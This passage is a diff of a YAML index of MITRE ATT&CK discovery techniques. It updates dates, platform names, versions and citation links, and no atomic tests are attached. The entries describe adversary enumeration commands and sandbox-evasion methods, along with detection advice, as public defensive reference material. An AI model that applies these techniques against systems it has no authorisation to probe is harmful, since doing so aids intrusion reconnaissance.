-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -49034,7 +49750,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -49055,7 +49770,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -49076,13 +49791,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -49105,15 +49818,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -49139,13 +49851,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49170,12 +49881,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -49217,13 +49927,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49284,12 +49993,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49353,19 +50061,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -49412,7 +50119,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -49479,12 +50185,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -49574,18 +50279,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1069.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:16:47.754Z'
       name: 'Permission Groups Discovery: Domain Groups'
       description: |-
         Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -49628,12 +50332,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.002
     atomic_tests: []
   T1007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:55:18.326Z'
       name: System Service Discovery
       description: |-
         Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
@@ -49674,12 +50377,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1007
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49764,7 +50466,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49826,12 +50527,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49882,12 +50582,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49898,7 +50597,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49913,7 +50611,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49961,7 +50658,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -50033,12 +50731,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -50080,122 +50777,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -50210,6 +50858,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -50219,9 +50873,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50231,102 +50890,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
